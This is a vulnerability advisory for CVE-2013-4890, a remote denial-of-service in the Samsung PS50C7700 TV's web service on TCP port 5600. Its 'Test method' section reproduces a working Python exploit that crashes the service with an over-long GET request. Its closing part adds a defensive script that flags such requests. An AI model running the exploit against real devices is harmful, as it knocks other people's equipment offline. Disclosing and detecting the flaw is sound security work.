
Samsung PS50C7700 3D Plasma-TV Denial of Service Vulnerability (CVE-2013-4890)

Published: 2013-07-21
Updated: 2013-07-25

Affected systems:
Samsung PS50C7700 3D Plasma-TV

Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61391
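CVE(CAN) ID: CVE-2013-4890

The Samsung PS50C7700 3D Plasma-TV is a plasma television.

The Samsung PS50C7700 3D Plasma-TV has a remote denial-of-service vulnerability. An attacker can exploit it by sending an overly long HTTP GET request, which crashes the web service (DMCRUIS/0.1) on port TCP 5600 and results in a denial of service.

<*Source: Malik Mesellem

  Link: http://packetstormsecurity.com/files/122502/samsungtv5600-dos.txt
*>

Test method: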
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

#!/usr/bin/python

#Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
#Exploit: Denial of Service (DoS) attack
#Description: Resets some Samsung TVs
#The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#Tested successfully on my Samsung PS50C7700 plasma TV :)

import httplib
import sys
import os

print "  ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com "
print " Exploit: Denial of Service (DoS) attack "
print " Description: Resets some Samsung TVs "
print "   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "   Tested successfully on my Samsung PS50C7700 plasma TV :) "
print "  *************************************************************************************** "

#Sends the payload
print "  Sending the malicious payload... "
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

#Checks the response
print "  Checking the status... (CTRL+Z to stop) "
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down! "

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Samsung
-------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.samsung.com/
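
With no vendor patch available, one defensive use of the description above is to watch traffic to TCP/5600 for abnormally long HTTP request targets. The following is an added example, not part of the original advisory or the researcher's code; the 256-byte threshold, the record layout and the sample traffic are assumptions constructed for illustration.

```python
# Added example (not from the advisory): flag over-long HTTP request targets
# sent to TCP/5600. MAX_TARGET_LEN and the record layout are assumptions.
from typing import Iterable, List, NamedTuple, Optional, Tuple

SERVICE_PORT = 5600      # port named in the advisory
MAX_TARGET_LEN = 256     # assumed threshold; tune against normal traffic


class Finding(NamedTuple):
    src: str
    method: str
    target_len: int


def split_request_line(payload: bytes) -> Optional[Tuple[str, bytes]]:
    """Return (method, target) from the first line of an HTTP request."""
    line = payload.split(b"\n", 1)[0].rstrip(b"\r")
    parts = line.split(b" ")
    if len(parts) < 2 or not parts[0].isalpha():
        return None  # not an HTTP request line (e.g. TLS or binary data)
    # Drop a trailing "HTTP/x.y" token if present; the rest is the target.
    if len(parts) >= 3 and parts[-1].startswith(b"HTTP/"):
        parts = parts[:-1]
    return parts[0].decode("ascii"), b" ".join(parts[1:])


def find_oversized(records: Iterable[Tuple[str, int, bytes]],
                   limit: int = MAX_TARGET_LEN) -> List[Finding]:
    """records: (source address, destination port, first TCP payload)."""
    findings = []
    for src, dport, payload in records:
        if dport != SERVICE_PORT:
            continue  # only the service described in the advisory
        parsed = split_request_line(payload)
        if parsed is not None and len(parsed[1]) > limit:
            findings.append(Finding(src, parsed[0], len(parsed[1])))
    return findings


# Constructed sample records (documentation addresses, hypothetical paths).
SAMPLE = [
    ("192.0.2.10", 5600, b"GET /description.xml HTTP/1.1\r\nHost: tv\r\n\r\n"),
    ("192.0.2.66", 5600, b"GET " + b"A" * 300 + b" HTTP/1.1\r\nHost: tv\r\n\r\n"),
    ("192.0.2.66", 80, b"GET /" + b"B" * 400 + b" HTTP/1.1\r\n\r\n"),
]

if __name__ == "__main__":
    for f in find_oversized(SAMPLE):
        print("ALERT src=%s method=%s target_len=%d" % f)
```

Until a fix exists, the same length check can back a filtering rule in front of the TV, or the port can simply be blocked from untrusted network segments.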